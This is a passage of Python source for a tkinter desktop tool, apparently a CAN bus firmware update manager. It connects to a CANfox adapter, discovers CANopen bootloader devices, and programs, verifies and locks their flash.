}[self.__workingAction]()\n return\n def __add_log_msg__(self, message):\n self.flLstResults.insert(tk.END, \"[\" + datetime.datetime.now().strftime(\"%H:%M:%S\")+\"] \" + message)\n self.flLstResults.yview(tk.END)\n return\n\n\n # Creation of init_window\n def init_window(self):\n defaultMainWindowSizeX = 600\n defaultMainWindowSizeY = 400\n # changing the title of our master widget\n t = os.path.getmtime(os.path.realpath(__file__))\n self.master.title(\"CAN Update Manager v1.002.\" + str(int(t))+\"b\")\n self.master.minsize(100, 100)\n self.master.geometry(str(defaultMainWindowSizeX) + \"x\" + str(defaultMainWindowSizeY))\n self.master.bind(\"\", self.key)\n #import settings\n\n script_dir = os.path.dirname(__file__) # <-- absolute dir the script is in\n rel_path_settings = r\"settings.ini\"\n abs_path_settings = os.path.join(script_dir, rel_path_settings)\n self.settings = settings.Settings(abs_path_settings)\n #MainMenu init\n tkMainMenu = Menu(self.master)\n self.master.config(menu=tkMainMenu)\n tkMainManuMenuItemFile = Menu(tkMainMenu, tearoff=0)\n tkMainMenu.add_cascade(label=\"File\", menu=tkMainManuMenuItemFile)\n tkMainMenu.add_command(label=\"About\", command=lambda: CANLoaderAbout.MyDialog(self.master))\n #tkMainManuMenuItemAbout = Menu(tkMainMenu, tearoff=0)\n #tkMainManuMenuItemAbout.add_command(label=\"About program\", command=lambda: CANLoaderAbout.MyDialog(self.master))\n tkMainManuMenuItemFile.add_command(label=\"Exit\", command=lambda: self.master.destroy())\n\n #tkMainMenu.add_cascade(label=\"About\", menu=tkMainManuMenuItemAbout)\n # allowing the widget to take the full space of the root window\n self.grid_columnconfigure(0, weight=1)\n self.grid_rowconfigure(0, weight=1)\n\n #tabControlWidget\n tabControl = ttk.Notebook(self)\n tabProgramming = ttk.Frame(tabControl)\n tabSettings = ttk.Frame(tabControl)\n tabControl.add(tabProgramming, text=\"Programming\")\n tabControl.add(tabSettings, text=\"Settings\")\n\n tabControl.grid(row=0, column=0, sticky=tk.N + tk.S + tk.W + tk.E, padx=3, pady=3)\n tabControl.rowconfigure(0, weight=1)\n tabControl.columnconfigure(0, weight=1)\n tabProgramming.columnconfigure(0, weight=1)\n tabProgramming.rowconfigure(0, weight=1) #frameCanDevice\n tabProgramming.rowconfigure(1, weight=1) #frameProgramming\n tabProgramming.rowconfigure(2, weight=1) #frameLog\n tabProgramming.rowconfigure(3, weight=1) #statusBar\n # window positioning\n xpos = self.master.winfo_screenwidth() / 2 - defaultMainWindowSizeX / 2\n ypos = self.master.winfo_screenheight() / 2 - defaultMainWindowSizeY / 2\n self.master.geometry(\"+%d+%d\" % (xpos, ypos))\n # set icon\n current_dir = os.path.dirname(os.path.realpath(__file__))\n icon_path = os.path.join(current_dir, r'Images\\ico_canbus.ico')\n if os.path.exists(icon_path) and os.path.isfile(icon_path):\n self.master.iconbitmap(icon_path)\n # frameCanDevice configuring\n self.frameCanDevice = tk.LabelFrame(tabProgramming, relief=tk.RAISED, borderwidth=1, text=\"CAN Device\")\n self.frameCanDevice.grid(row=0, column=0, sticky=tk.N + tk.S + tk.W + tk.E, padx=5, pady=5)\n self.frameCanDevice.columnconfigure(0, weight=1, pad=3)\n self.frameCanDevice.columnconfigure(1, weight=1, pad=3)\n self.frameCanDevice.columnconfigure(2, weight=10, pad=3)\n self.frameCanDevice.columnconfigure(3, weight=1, pad=3)\n self.frameCanDevice.columnconfigure(4, weight=1, pad=3)\n self.frameCanDevice.rowconfigure(0, weight=1, pad=3) #buttonFind and ListBox with found devices\n self.frameCanDevice.rowconfigure(1, weight=1, pad=3) #frameFoundCanDevices\n\n self.buttonCanConnect = tk.Button(self.frameCanDevice, wraplength=43, state=\"normal\", text=r\"CAN connect\", command=self.buttonCANConnectClick)\n self.buttonCanConnect.grid(row=0, column=0, sticky=tk.N + tk.S + tk.W + tk.E, padx=5, pady=5)\n self.buttonFind = tk.Button(self.frameCanDevice, wraplength=43, state=\"normal\", text=\"Read\", command=self.buttonFindClick)\n self.buttonFind.grid(row=0, column=1, sticky=tk.N + tk.S + tk.W + tk.E, padx=5, pady=5)\n self.frameFoundCanDevices = tk.LabelFrame(self.frameCanDevice, relief=tk.RAISED, borderwidth=1, text=\"Devices Found\")\n self.frameFoundCanDevices.grid(row=0, column=2, sticky=tk.N + tk.S + tk.W + tk.E, padx=5, pady=5)\n self.frameFoundCanDevices.columnconfigure(0, weight=1, pad=3)\n self.frameFoundCanDevices.rowconfigure(0, weight=1, pad=3)\n self.comboboxFoundCanDevices = ttk.Combobox(self.frameFoundCanDevices, values=[\n \"\"], state=\"disable\")\n self.comboboxFoundCanDevices.current(0)\n self.comboboxFoundCanDevices.bind(\"<>\", self.comboboxFoundCanDevices_Selected)\n self.comboboxFoundCanDevices.grid(row=0, column=0, sticky=tk.N + tk.S + tk.W + tk.E, padx=1, pady=1)\n self.buttonLeaveBootloader = tk.Button(self.frameCanDevice, wraplength=43, state=\"normal\", text=\"Leave Boot\", command=self.buttonLeaveBootloaderClick)\n self.buttonLeaveBootloader.grid(row=0, column=3, sticky=tk.N + tk.S + tk.W + tk.E, padx=5, pady=5)\n self.buttonLock = tk.Button(self.frameCanDevice, wraplength=43, state=\"normal\", text=\"Lock\", command=self.buttonLockClick)\n self.buttonLock.grid(row=0, column=4, sticky=tk.N + tk.S + tk.W + tk.E, padx=5, pady=5)\n\n self.frameCanDeviceSelectedDevice = tk.LabelFrame(self.frameCanDevice, relief=tk.RAISED, borderwidth=1, text=\"Selected Device\")\n self.frameCanDeviceSelectedDevice.grid(row=1, column=0, sticky=tk.N + tk.S + tk.W + tk.E, columnspan=5, padx=5, pady=5)\n self.frameCanDeviceSelectedDevice.columnconfigure(0, weight=1, pad=3)\n self.frameCanDeviceSelectedDevice.columnconfigure(1, weight=5, pad=3)\n self.frameCanDeviceSelectedDevice.columnconfigure(2, weight=1, pad=3)\n self.frameCanDeviceSelectedDevice.rowconfigure(0, weight=1, pad=3)\n self.frameCanDeviceSelectedDevice.rowconfigure(1, weight=1, pad=3)\n self.frameCanDeviceSelectedDevice.rowconfigure(2, weight=1, pad=3)\n self.frameCanDeviceSelectedDevice.rowconfigure(3, weight=1, pad=3)\n self.entryNodeIDText = tk.StringVar()\n self.entryNodeID = tk.Entry(self.frameCanDeviceSelectedDevice, state=\"disabled\", textvariable=self.entryNodeIDText)\n self.entryNodeID.grid(row=0, column=1, sticky=tk.N + tk.S + tk.W + tk.E, padx=3)\n #self.flashFilePath = tk.StringVar()\n #self.entryFlashFile = tk.Entry(self.frameProgramming, state=\"disabled\", textvariable=self.flashFilePath)\n self.labelNodeID = tk.Label(self.frameCanDeviceSelectedDevice, text=\"Node ID:\")\n self.labelNodeID.grid(row=0, column=0, sticky=tk.N + tk.S + tk.W + tk.E)\n self.entryMCUInfoText = tk.StringVar()\n self.entryMCUInfo = tk.Entry(self.frameCanDeviceSelectedDevice, state=\"disabled\", textvariable=self.entryMCUInfoText)\n self.entryMCUInfo.grid(row=1, column=1, sticky=tk.N + tk.S + tk.W + tk.E, padx=3)\n self.labelMCUInfo = tk.Label(self.frameCanDeviceSelectedDevice, text=\"MCU Info:\")\n self.labelMCUInfo.grid(row=1, column=0, sticky=tk.N + tk.S + tk.W + tk.E)\n self.labelStatus = tk.Label(self.frameCanDeviceSelectedDevice, text=\"None\")\n self.labelStatus.grid(row=0, column=2, sticky=tk.N + tk.S + tk.W + tk.E, rowspan=2)\n self.labelStatus.config(bg=\"gray\")\n\n #frameProgramming configuring\n self.frameProgramming = tk.LabelFrame(tabProgramming, relief=tk.RAISED, borderwidth=1, text=\"Flash programming\")\n self.frameProgramming.grid(row=1, column=0, sticky=tk.N + tk.S + tk.W + tk.E, padx=3, pady=3)\n self.frameProgramming.columnconfigure(0, weight=1, pad=3)\n self.frameProgramming.columnconfigure(1, weight=1, pad=3)\n self.frameProgramming.columnconfigure(2, weight=1, pad=3)\n self.frameProgramming.columnconfigure(3, weight=1, pad=3)\n self.frameProgramming.columnconfigure(4, weight=1, pad=3)\n self.frameProgramming.columnconfigure(5, weight=1, pad=3)\n self.frameProgramming.rowconfigure(0, weight=1, pad=3)\n self.frameProgramming.rowconfigure(1, weight=1, pad=3)\n\n #frameLog configuring\n self.frameLog = tk.LabelFrame(tabProgramming, relief=tk.RAISED, borderwidth=1, text=\"Log\")\n self.frameLog.grid(row=2, column=0, sticky=tk.N + tk.S + tk.W + tk.E, padx=5, pady=5)\n self.frameLog.columnconfigure(0, weight=20, pad=3)\n self.frameLog.columnconfigure(1, weight=1, pad=3)\n self.frameLog.rowconfigure(0, weight=1, pad=3)\n self.flLstResults = tk.Listbox(self.frameLog)\n self.flLstResults.config(height=5)\n self.flLstResults.grid(row=0, column=0, sticky=tk.N + tk.S + tk.W + tk.E)\n\n #statusBar configuring\n frameStatus = tk.Frame(tabProgramming, borderwidth=0)\n frameStatus.grid(row=3, column=0, sticky=tk.N + tk.S + tk.W + tk.E)\n frameStatus.columnconfigure(0, weight=1, pad=0)\n frameStatus.columnconfigure(1, weight=1, pad=0)\n frameStatus.rowconfigure(0, weight=1, pad=0)\n self.statusbarText = tk.StringVar()\n labelStatus = tk.Label(frameStatus, bd=1, relief=tk.SUNKEN, anchor=tk.W,\n textvariable=self.statusbarText)\n\n labelStatus.grid(row=0, column=0, sticky=tk.N + tk.S + tk.W + tk.E)\n s = ttk.Style()\n s.theme_use('alt')\n s.configure(\"red.Horizontal.TProgressbar\", foreground='red', background='green', padx=0, pady=0, pad=0)\n self.progressBar = ttk.Progressbar(frameStatus, mode=\"determinate\", style=\"red.Horizontal.TProgressbar\")\n self.progressBar.grid(row=0, column=1, sticky=tk.N + tk.S + tk.W + tk.E)\n self.progressBar['value'] = 0\n self.statusbarText.set('Started')\n\n labelInputFlash = tk.Label(self.frameProgramming, text=\"Input encoded .bin File\")\n labelInputFlash.grid(row=0, column=0, sticky=tk.N + tk.S + tk.W + tk.E)\n self.flashFilePath = tk.StringVar()\n self.entryFlashFile = tk.Entry(self.frameProgramming, state=\"disabled\", textvariable=self.flashFilePath)\n self.entryFlashFile.grid(row=0, column=1, sticky=tk.N + tk.S + tk.W + tk.E, columnspan=4)\n self.buttonSelectFlashFile = tk.Button(self.frameProgramming, state=\"disabled\", text=\"...\", command=self.buttonSelectFlashFileClick)\n self.buttonSelectFlashFile.grid(row=0, column=5, sticky=tk.N + tk.S + tk.W + tk.E, padx=5, pady=5)\n\n self.buttonProgramFlash = tk.Button(self.frameProgramming, state=\"disabled\", text=\"Program\", command=self.buttonProgramFlashClick)\n #self.buttonProgramFlash.config(state = \"disabled\")\n self.buttonProgramFlash.grid(row=1, column=0, sticky=tk.N + tk.S + tk.W + tk.E, padx=5, pady=5)\n self.buttonVerifyFlash = tk.Button(self.frameProgramming, state=\"disabled\", text=\"Verify\", command=self.buttonVerifyFlashClick)\n self.buttonVerifyFlash.grid(row=1, column=2, sticky=tk.N + tk.S + tk.W + tk.E, padx=5, pady=5)\n self.buttonReadFlash = tk.Button(self.frameProgramming, state=\"disabled\", text=\"Read\", command=self.buttonReadFlashClick)\n self.buttonReadFlash.grid(row=1, column=5, sticky=tk.N + tk.S + tk.W + tk.E, padx=5, pady=5)\n\n self.flLstResultsScrollbar = tk.Scrollbar(self.frameLog, orient=tk.VERTICAL)\n self.flLstResultsScrollbar.grid(row=0, column=1, sticky=tk.N + tk.S + tk.W + tk.E, pady=5)\n\n self.flLstResults.config(yscrollcommand=self.flLstResultsScrollbar.set)\n self.flLstResultsScrollbar.config(command=self.flLstResults.yview)\n\n '''second tab - settings'''\n tabSettings.rowconfigure(0, weight=1)\n tabSettings.rowconfigure(1, weight=1)\n tabSettings.rowconfigure(2, weight=1)\n tabSettings.columnconfigure(0, weight=1)\n #CAN settings frame\n self.frameSettingsCAN = tk.LabelFrame(tabSettings, relief=tk.RAISED, borderwidth=1, text=\"CAN Settings\")\n self.frameSettingsCAN.grid(row=0, column=0, sticky=tk.N + tk.S + tk.W + tk.E, padx=5, pady=5)\n self.frameSettingsCAN.rowconfigure(0, weight=1)\n self.frameSettingsCAN.columnconfigure(0, weight=1)\n self.frameSettingsCAN.columnconfigure(1, weight=5)\n labelCANSpeed = tk.Label(self.frameSettingsCAN, text=\"CAN Baudrate:\")\n labelCANSpeed.grid(row=0, column=0, sticky=tk.N + tk.S + tk.W + tk.E)\n self.comboboxCANSpeed = ttk.Combobox(self.frameSettingsCAN, values=self.settings.getDisplayValue(\"CANBaudrates\"), state=\"readonly\")\n baudrate = self.settings.get(\"CAN\", \"BaudRate\")\n if baudrate in self.comboboxCANSpeed['values']:\n self.comboboxCANSpeed.current(self.comboboxCANSpeed['values'].index(baudrate))\n else:\n self.comboboxCANSpeed.current(0)\n self.comboboxCANSpeed.bind(\"<>\", self.comboboxCANSpeed_Selected)\n self.comboboxCANSpeed.grid(row=0, column=1, sticky=tk.N + tk.S + tk.W + tk.E, padx=1, pady=1)\n #CANOpen settings frame\n self.frameSettingsCANOpen = tk.LabelFrame(tabSettings, relief=tk.RAISED, borderwidth=1, text=\"CANOpen Settings\")\n self.frameSettingsCANOpen.grid(row=1, column=0, sticky=tk.N + tk.S + tk.W + tk.E, padx=5, pady=5)\n self.frameSettingsCANOpen.rowconfigure(0, weight=1)\n self.frameSettingsCANOpen.columnconfigure(0, weight=1)\n self.frameSettingsCANOpen.columnconfigure(1, weight=5)\n labelCANOpenId = tk.Label(self.frameSettingsCANOpen, text=\"CANOpen ID:\")\n labelCANOpenId.grid(row=0, column=0, sticky=tk.N + tk.S + tk.W + tk.E)\n\n self.comboboxCANOpenSelfId = ttk.Combobox(self.frameSettingsCANOpen, state=\"readonly\", values = [c for c in range(1, 128)])\n nodeId = self.settings.get(\"CANOpen\", \"NodeID\")\n self.comboboxCANOpenSelfId.grid(row=0, column=1, sticky=tk.N + tk.S + tk.W + tk.E, padx=1, pady=1)\n if nodeId in self.comboboxCANOpenSelfId['values']:\n self.comboboxCANOpenSelfId.current(self.comboboxCANOpenSelfId['values'].index(nodeId))\n else:\n self.comboboxCANOpenSelfId.current(0)\n self.comboboxCANOpenSelfId.bind(\"<>\", self.comboboxCANOpenSelfId_Selected)\n self.labelNodeID = tk.Label(self.frameCanDeviceSelectedDevice, text=\"Node ID:\")\n #Flash settings frame\n self.frameSettingsFlash = tk.LabelFrame(tabSettings, relief=tk.RAISED, borderwidth=1, text=\"Flash Settings\")\n self.frameSettingsFlash.grid(row=2, column=0, sticky=tk.N + tk.S + tk.W + tk.E, padx=5, pady=5)\n\n self.pack(fill=tk.BOTH, expand=tk.YES)\n\n self.__disable_controls__(self.frameCanDevice)\n self.buttonCanConnect.config(state=\"normal\")\n\n self.__add_log_msg__(\"Started OK\")\n self.__add_log_msg__('Press \"' + self.buttonCanConnect['text'] + '\" button to connect to the CAN network')\n self.master.protocol(\"WM_DELETE_WINDOW\", self._delete_window)\n self.__workingAction = WorkingAction.wa_INIT\n self.__switch_controls__(te_OperationState.os_END)\n self.master.mainloop()\n # def buttonClick(self):\n # messagebox.showinfo(\"Say Hello\", \"Hello World\")\n\n def _delete_window(self):\n try:\n del self.canLoaderController\n except Exception:\n pass\n else:\n self.__add_log_msg__('Ok! Thank you. Goodbye!')\n self.master.destroy()\n\n def buttonCANConnectClick(self):\n self.__switch_controls__(te_OperationState.os_BEGIN)\n try:\n self.canLoaderController = CANLoaderController(self.settings)\n self.labelStatus['text'] = \"None\"\n self.labelStatus.config(bg=\"gray\")\n except CANfoxException as e:\n self.__workingAction = WorkingAction.wa_INIT\n self.__add_log_msg__(str(e))\n else:\n self.flLstResults.delete(0, tk.END)\n self.buttonCanConnect.configure(state='disable')\n self.buttonFind.configure(state='normal')\n self.__add_log_msg__('Successfully connected to CANfox transceiver. Press \"' + self.buttonFind['text'] + '\" button to discover devices')\n self.__workingAction = WorkingAction.wa_NONE\n self.__switch_controls__(te_OperationState.os_END)\n\n def buttonFindClick(self):\n self.sieca_lib = sieca132_client()\n\n l_netnumber = 105\n l_txtimeout = -1\n l_rxtimeout = -1\n\n c_canAppName = \"canAppName\"\n c_ReceiverEventName = \"RE1\"\n c_ErrorEventName = \"EE1\"\n\n d_retval = self.sieca_lib.canOpen(l_netnumber, 0, 0, l_txtimeout, l_rxtimeout, c_canAppName,\n c_ReceiverEventName, c_ErrorEventName)\n # self.flLstResults.insert(tk.END, CANTypeDefs.ReturnValues(d_retval[\"l_retval\"]), d_retval[\"handle\"])\n self.siecaLibHandle = d_retval[\"handle\"]\n # siecaDllInfo = CANTypeDefs.st_InternalDLLInformation()\n # res = self.sieca_lib.canGetDllInfo(ctypes.addressof(siecaDllInfo))\n self.flLstResults.insert(tk.END, \"sieca_lib: \" + str(self.sieca_lib))\n # self.flLstResults.insert(tk.END, CANTypeDefs.ReturnValues(res))\n # self.flLstResults.insert(tk.END, siecaDllInfo.aui_TxCounter)\n\n l_retval = self.sieca_lib.canSetBaudrate(self.siecaLibHandle,\n int(CANTypeDefs.Baudrate.BAUD_250)) # 250 kbits/sec\n self.flLstResults.insert(tk.END, \"Set Baudrate: \" + str(CANTypeDefs.ReturnValues(l_retval)))\n l_retval = self.sieca_lib.canBlinkLED(self.siecaLibHandle, 0, 0b111, 0b101)\n self.flLstResults.insert(tk.END, \"LED flashing settings applied: \" + str(CANTypeDefs.ReturnValues(l_retval)))\n l_retval = self.sieca_lib.canIsNetOwner(d_retval[\"handle\"])\n self.flLstResults.insert(tk.END, \"CanIsNetOwner: \" + str(CANTypeDefs.ReturnValues(l_retval)))\n\n l_retval = self.sieca_lib.canSetFilterMode(self.siecaLibHandle, CANTypeDefs.T_FILTER_MODE.filterMode_nofilter)\n self.flLstResults.insert(tk.END, \"CanSetFilterMode: \" + str(CANTypeDefs.ReturnValues(l_retval)))\n message_reader = ThreadCANMsgReader(self.siecaLibHandle, self.sieca_lib, self.QueueIncomingMessages)\n message_reader.start()\n\n # d_retval = self.sieca_lib.canRead(self.siecaLibHandle)\n # self.flLstResults.insert(tk.END, \"DataCount: \" + str(d_retval[\"l_len\"]))\n # self.flLstResults.insert(tk.END, \"DataCount: \" + str(CANTypeDefs.ReturnValues(d_retval[\"l_retval\"])))\n\n '''d_retval = self.sieca_lib.canRead(self.canfox_handle)\n for item in range(0, d_retval[\"l_len\"].value):\n self.queue.put(d_retval[\"canmsg\"][item])'''\n self.check_my_msg()\n '''i = 0\n while i < 10:\n d_retval = self.sieca_lib.canRead(self.siecaLibHandle)\n\n\n for item in range(0, d_retval[\"l_len\"].value):\n msg1 = d_retval[\"canmsg\"][item]\n #msg2 = d_retval[\"canmsg\"][0]\n s_data = \"\"\n #s_data = msg1.aby_data\n for y in range(0, msg1.by_len):\n s_data += str(hex(msg1.aby_data[y])) + \" \"\n self.__add_log_msg__(\"[\" + str(hex(msg1.l_id)) + \"] Data = \" + s_data + \"; Len = \" + str(msg1.by_len) + \"; Ext: \" + str(msg1.by_extended) + \";\")\n i += 1'''\n\n #self.process_queue()\n\n return\n '''for y in range(0, msg.by_len):\n s_data += \"[\" + str(y) + \"] = \" + str(hex(msg.aby_data[y])) + \"; \"\n self.flLstResults.insert(tk.END, \"l_id: \" + str(hex(msg.l_id)) + \" by_len: \" + str(\n msg.by_len) + \" by_msg_lost: \" + str(msg.by_msg_lost) +\n \" by_extended: \" + str(msg.by_extended) + \" by_remote: \" + str(\n msg.by_remote) + \" ul_tstamp: \" + str(msg.ul_tstamp) + \" Data = \" + s_data)'''\n\n \"\"\"\n self.CurrentDeviceBootloaderState = te_CurrentDeviceBootloaderState.bs_Unknown\n self.buttonFind.configure(state='disable')\n self.flLstResults.delete(0, tk.END)\n self.__add_log_msg__('CANLoader devices searching...')\n try:\n nodes = self.canLoaderController.discover_connected_devices()\n except CANfoxHardwareException as e:\n self.__add_log_msg__(\"Hardware error: \" + str(e))\n self.__switch_controls__(te_OperationState.os_END)\n self.__workingAction = WorkingAction.wa_HARDWARE_ERROR\n self.StatusBarUpdaterFunction()\n return\n except Exception as e:\n self.__add_log_msg__(\"Software error: \" + str(e))\n self.__switch_controls__(te_OperationState.os_END)\n self.__workingAction = WorkingAction.wa_ERROR\n self.StatusBarUpdaterFunction()\n return\n nodes.sort()\n nodes_text = \"CAN IDs': \"\n nodes_delimeter = \"\"\n for node_id in nodes:\n nodes_text = nodes_text + nodes_delimeter + ' {}'.format(str(node_id))\n nodes_delimeter = \",\"\n if len(nodes) != 0:\n self.__add_log_msg__(\"Found {} CAN devices(s): {}\".format(len(nodes), nodes_text))\n else:\n self.__add_log_msg__(\"Any CANopen devices on CAN bus not found\")\n try:\n self.reprogrammable_devices = self.canLoaderController.find_reprogrammable_devices()\n except CANfoxHardwareException as e:\n self.__add_log_msg__(\"Hardware error: \" + str(e))\n self.__workingAction = WorkingAction.wa_HARDWARE_ERROR\n self.__switch_controls__(te_OperationState.os_END)\n self.StatusBarUpdaterFunction()\n return\n except Exception as e:\n self.__add_log_msg__(\"Software error: \" + str(e))\n self.__workingAction = WorkingAction.wa_ERROR\n self.__switch_controls__(te_OperationState.os_END)\n self.StatusBarUpdaterFunction()\n return\n\n if len(self.reprogrammable_devices) != 0:\n self.__add_log_msg__(\"Found {} CANOpen bootloader devices(s): \".format(len(self.reprogrammable_devices)))\n items = list()\n for iterator, node in self.reprogrammable_devices.items():\n programmable_nodes_text = \"CANOpen ID: {}\".format(node.id)\n items.append(\n \"NodeID: {}, Name(1008/0): {}\".format(node.id, node._bag_['Manufacturer device name (0x1008_0)']))\n\n for node_param_desc, node_param_value in node._bag_.items():\n programmable_nodes_text += \";{}={}\".format(node_param_desc, node_param_value)\n self.__add_log_msg__(programmable_nodes_text)\n self.comboboxFoundCanDevices['values'] = items\n self.comboboxFoundCanDevices.current(0)\n\n self.entryNodeIDText.set('{}'.format(self.reprogrammable_devices[0].id))\n self.entryMCUInfoText.set('{}'.format(self.reprogrammable_devices[0]._bag_['Manufacturer device name (0x1008_0)']))\n self.labelStatus['text'] = \"Ready\"\n self.labelStatus.config(bg=\"green\")\n else:\n self.__disable_controls__(self.frameCanDeviceSelectedDevice)\n self.__workingAction = WorkingAction.wa_NONE\n self.__switch_controls__(te_OperationState.os_END)\n self.buttonFind.configure(state='normal')\n return\"\"\"\n\n def check_my_msg(self):\n d_retval = self.sieca_lib.canRead(self.siecaLibHandle)\n\n for item in range(0, d_retval[\"l_len\"].value):\n msg1 = d_retval[\"canmsg\"][item]\n # msg2 = d_retval[\"canmsg\"][0]\n s_data = \"\"\n # s_data = msg1.aby_data\n for y in range(0, msg1.by_len):\n s_data += str(hex(msg1.aby_data[y])) + \" \"\n self.__add_log_msg__(\n \"[\" + str(hex(msg1.l_id)) + \"] Data = \" + s_data + \"; Len = \" + str(msg1.by_len) + \"; Ext: \" + str(\n msg1.by_extended) + \";\")\n self.master.after(100, self.check_my_msg)\n\n def buttonLeaveBootloaderClick(self):\n self.__workingAction = WorkingAction.wa_NONE\n self.__switch_controls__(te_OperationState.os_BEGIN)\n current_device = self.comboboxFoundCanDevices.current()\n try:\n self.canLoaderController.mcu_leave_bootloader(current_device)\n except CANLoaderDeviceFailureException as e:\n self.__add_log_msg__(\"Error: \" + str(e))\n self.__workingAction = WorkingAction.wa_HARDWARE_ERROR\n except Exception as e:\n self.__add_log_msg__(\"Error: \" + str(e))\n self.__workingAction = WorkingAction.wa_ERROR\n else:\n self.CurrentDeviceBootloaderState = te_CurrentDeviceBootloaderState.bs_Unknown\n self.__add_log_msg__(\"Left bootloader\")\n self.StatusBarUpdaterFunction()\n self.__switch_controls__(te_OperationState.os_END)\n return\n\n def process_queue(self):\n try:\n while self.QueueIncomingMessages.qsize() > 0:\n #time.sleep(0.1)\n msg = self.QueueIncomingMessages.get(0)\n d_retval = self.sieca_lib.canRead(self.siecaLibHandle)\n s_data = d_retval[\"canmsg\"]\n self.__add_log_msg__(\"Data = \" + str(s_data))\n '''self.flLstResults.insert(tk.END, \"l_id: \" + str(hex(msg.l_id)) + \" by_len: \" + str(\n msg.by_len) + \" by_msg_lost: \" + str(msg.by_msg_lost) +\n \" by_extended: \" + str(msg.by_extended) + \" by_remote: \" + str(\n msg.by_remote) + \" ul_tstamp: \" + str(msg.ul_tstamp) + \" Data = \" + s_data)'''\n #self.flLstResults.select_clear(self.flLstResults.size() - 2) # Clear the current selected item\n #self.flLstResults.select_set(tk.END) # Select the new item\n if self.flLstResults.size() > 100:\n self.flLstResults.delete(0)\n self.flLstResults.yview(tk.END) # Set the scrollbar to the end of the listbox\n except queue.Empty:\n pass #no data\n #self.master.after(100, self.process_queue)\n\n def buttonLockClick(self):\n current_device = self.comboboxFoundCanDevices.current()\n self.__workingAction = WorkingAction.wa_NONE\n self.__switch_controls__(te_OperationState.os_BEGIN)\n try:\n self.canLoaderController.move_mcu_to_bootloader(current_device)\n self.canLoaderController.mcu_lock(current_device)\n except CANLoaderDeviceFailureException as e:\n self.__add_log_msg__(\"Error: \" + str(e))\n self.__workingAction = WorkingAction.wa_HARDWARE_ERROR\n except Exception as e:\n self.__add_log_msg__(\"Error: \" + str(e))\n self.__workingAction = WorkingAction.wa_ERROR\n else:\n self.__add_log_msg__(\"Device locked\")\n self.__workingAction = WorkingAction.wa_NONE\n self.StatusBarUpdaterFunction()\n self.__switch_controls__(te_OperationState.os_END)\n return\n\n def buttonSelectFlashFileClick(self):\n filename = filedialog.askopenfilename(initialdir=\"/\", title=\"Select file\",\n filetypes=((\"Encoded bin file\", \"*.bin\"), (\"All files\", \"*.*\")))\n if filename:\n self.__add_log_msg__(\"You has selected file: \" + filename)\n try:\n filesize = os.path.getsize(filename)\n if os.path.exists(filename) and filesize > 0 and (filesize % 8 == 0):\n self.flashFilePath.set(filename)\n else:\n raise Exception('File not exists, empty, or corrupted.')\n if len(self.reprogrammable_devices) > 0:\n self.__enable_controls_programming__()\n except Exception as e:\n self.__add_log_msg__(\"Error opening file: \" + str(e))\n else:\n pass\n\n def FirmwareVerifierFunction(self):\n try:\n current_device = self.comboboxFoundCanDevices.current()\n self.canLoaderController.move_mcu_to_bootloader(current_device)\n self.QueueThreadVerifyingService.empty()\n self.CurrentDeviceBootloaderState = te_CurrentDeviceBootloaderState.bs_InBootloader\n self.canLoaderController.verify_firmware_file(current_device, self.flashFilePath, self.QueueProgressBar,\n self.QueueThreadVerifyingService)\n self.__workingAction = WorkingAction.wa_NONE\n self.__add_log_msg__(\"Verifying completed successfully\")\n except CANLoaderFirmwareVerifyException as e:\n self.__add_log_msg__(\"Verify error: \" + str(e))\n self.__workingAction = WorkingAction.wa_ERROR\n except CANfoxHardwareException as e:\n self.__add_log_msg__(\"Hardware error: \" + str(e))\n self.__workingAction = WorkingAction.wa_HARDWARE_ERROR\n except Exception as e:\n self.__add_log_msg__(\"Error: \" + str(e))\n self.__workingAction = WorkingAction.wa_ERROR\n else:\n self.__workingAction = WorkingAction.wa_NONE\n return\n\n def buttonVerifyFlashClick(self):\n self.__workingAction = WorkingAction.wa_VERIFYING\n self.__switch_controls__(te_OperationState.os_BEGIN)\n\n self.__add_log_msg__(\"Verifying target...\")\n Thread(target=self.FirmwareVerifierFunction).start()\n self.master.after(250, self.StatusBarUpdaterFunction)\n self.labelStatus['text'] = \"Verifying\"\n self.labelStatus.config(bg=\"yellow\")\n\n def FirmwareProgrammerFunction(self):\n try:\n current_device = self.comboboxFoundCanDevices.current()\n self.canLoaderController.move_mcu_to_bootloader(current_device)\n self.CurrentDeviceBootloaderState = te_CurrentDeviceBootloaderState.bs_InBootloader\n self.QueueThreadProgrammingService.empty()\n #0. Check Read/Write protection state of MCU. It's important - read_level2 and WrPr blocks are not accessible for this types of operation\n self.canLoaderController.reset_lock_state(current_device)\n self.__add_log_msg__(\"Device unlocked.\")\n self.__add_log_msg__(\"Programming target...\")\n self.canLoaderController.upload_firmware_file(current_device, self.flashFilePath, self.QueueProgressBar,\n self.QueueThreadProgrammingService)\n self.__workingAction = WorkingAction.wa_NONE\n self.__add_log_msg__(\"Programming completed successfully\")\n except CANLoaderFirmwareVerifyException as e:\n self.__add_log_msg__(\"CRC32 error: \" + str(e))\n self.__workingAction = WorkingAction.wa_ERROR\n except CANfoxHardwareException as e:\n self.__add_log_msg__(\"Hardware error: \" + str(e))\n self.__workingAction = WorkingAction.wa_HARDWARE_ERROR\n except Exception as e:\n self.__add_log_msg__(\"Programming error: \" + str(e))\n self.__workingAction = WorkingAction.wa_ERROR\n else:\n self.__workingAction = WorkingAction.wa_NONE\n return\n\n def StatusBarUpdaterFunction(self):\n try:\n while self.QueueProgressBar.qsize() > 0:\n progress = self.QueueProgressBar.get(0)\n self.progressBar['value'] = progress\n self.statusbarText.set(\"{:.2f}\".format(progress) + \"%\")\n except queue.Empty:\n pass #no data\n if self.__workingAction == WorkingAction.wa_PROGRAMMING or \\\n self.__workingAction == WorkingAction.wa_VERIFYING or \\\n self.__workingAction == WorkingAction.wa_DEVICE_READING:\n self.master.after(250, self.StatusBarUpdaterFunction)\n elif self.__workingAction == WorkingAction.wa_NONE:\n self.progressBar['value'] = 0\n self.__add_log_msg__(\"Operation done\")\n self.statusbarText.set(\"Operation done\")\n self.labelStatus['text'] = \"Ready\"\n self.labelStatus.config(bg=\"green\")\n self.__switch_controls__(te_OperationState.os_END)\n elif self.__workingAction == WorkingAction.wa_ERROR or self.__workingAction == WorkingAction.wa_HARDWARE_ERROR:\n self.labelStatus['text'] = \"Error\"\n self.labelStatus.config(bg=\"red\")\n self.__switch_controls__(te_OperationState.os_END)\n return\n\n def buttonProgramFlashClick(self):\n self.__workingAction = WorkingAction.wa_PROGRAMMING\n self.__switch_controls__(te_OperationState.os_BEGIN)\n self.__add_log_msg__(\"Move to bootloader: done.\")\n # creating new thread for sync operations\n Thread(target=self.FirmwareProgrammerFunction).start()\n self.master.after(250, self.StatusBarUpdaterFunction)\n 